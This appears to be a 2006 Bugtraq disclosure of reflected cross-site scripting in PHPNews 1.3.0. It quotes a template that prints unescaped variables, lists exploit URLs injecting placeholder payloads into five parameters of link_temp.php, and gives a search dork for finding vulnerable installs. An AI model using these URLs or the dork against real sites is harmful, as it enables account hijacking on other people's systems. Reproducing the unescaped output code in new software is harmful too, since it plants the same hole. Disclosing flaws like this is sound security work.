[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
PHPNews 1.3.0 XSS
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: PHPNews 1.3.0 XSS
- From: emulamex@xxxxxxxxxxx
- Date: 1 Dec 2006 20:57:10 -0000
PHP Script: PHPNews 1.3.0
Class: XSS
Website: http://newsphp.sourceforge.net
Found by: Detefix
dork: inurl:phpnews
-----
- Vulnerable Code:
<?php
print<<<EOT
<a href="$url?action=fullnews&showcomments=1&id=$id">$subject</a> by
$username on $time<br />
-----
- Exploits:
http://[target]/[path-to-PHPNews]/templates/link_temp.php?url=">[XSS]
http://[target]/[path-to-PHPNews]/templates/link_temp.php?id=">[XSS]
http://[target]/[path-to-PHPNews]/templates/link_temp.php?subject=[XSS]
http://[target]/[path-to-PHPNews]/templates/link_temp.php?username=[XSS]
http://[target]/[path-to-PHPNews]/templates/link_temp.php?time=[XSS]